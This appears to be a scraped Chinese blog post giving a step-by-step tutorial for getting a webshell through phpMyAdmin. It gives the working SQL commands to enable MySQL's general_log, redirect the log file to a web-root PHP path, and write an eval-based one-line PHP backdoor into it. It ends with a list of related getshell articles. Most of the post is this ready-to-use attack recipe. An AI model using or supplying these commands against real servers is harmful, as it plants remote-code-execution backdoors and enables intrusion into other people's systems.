經過 phpmyadmin getshell
經過 phpmyadmin getshellphp
general_log默認爲關閉的,root權限開啓後,general_log_file會保存全部的查詢語句python
能夠開啓general_log,而後設置general_log_file爲一個php文件,最後用一句話木馬進行查詢來獲取shellshell
進入phpmyadmin後在SQL處執行SQL語句code
首先查看general log是否開啓blog
show variables like 'general_log';
general log是關閉狀態,執行SQL語句開啓general logget
SET GLOBAL general_log = ON
開啓成功class
而後把general_log_file設置爲shell的絕對路徑file
SET global general_log_file='D:/wamp/www/orange.php';
看下剛剛建立的orange.php裏的內容權限
而後執行SQL查詢語句,寫個一句話進去。im
SELECT '<?php @eval($_POST["orange"]);?>';
如今再看下orange.php裏面的內容
成功插入了一句話木馬
一句話連接在根目錄(http://127.0.0.1/orange.php)
至此結束!
任重而道遠!
相關文章
- 1. 經過 phpmyadmin getshell
- 2. phpmyadmin+日誌getshell
- 3. phpmyadmin getshell到提權
- 4. phpmyadmin之getshell總結
- 5. phpmyadmin getshell兩種思路
- 6. getshell之Phpmyadmin寫日誌
- 7. phpMyAdmin checkPageValidity 函數缺陷可致使 GETSHELL
- 8. 經過yum安裝lnmp-phpmyadmin
- 9. getshell之後難忘的經歷
- 10. phpmyadmin4.8.1後臺getshell
- 更多相關文章...
- • PHP imageaffine - 返回經過仿射變換後的圖像 - PHP參考手冊
- • jQuery Mobile 過渡 - jQuery Mobile 教程
- • 爲了進字節跳動,我精選了29道Java經典算法題,帶詳細講解
- • PHP開發工具
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
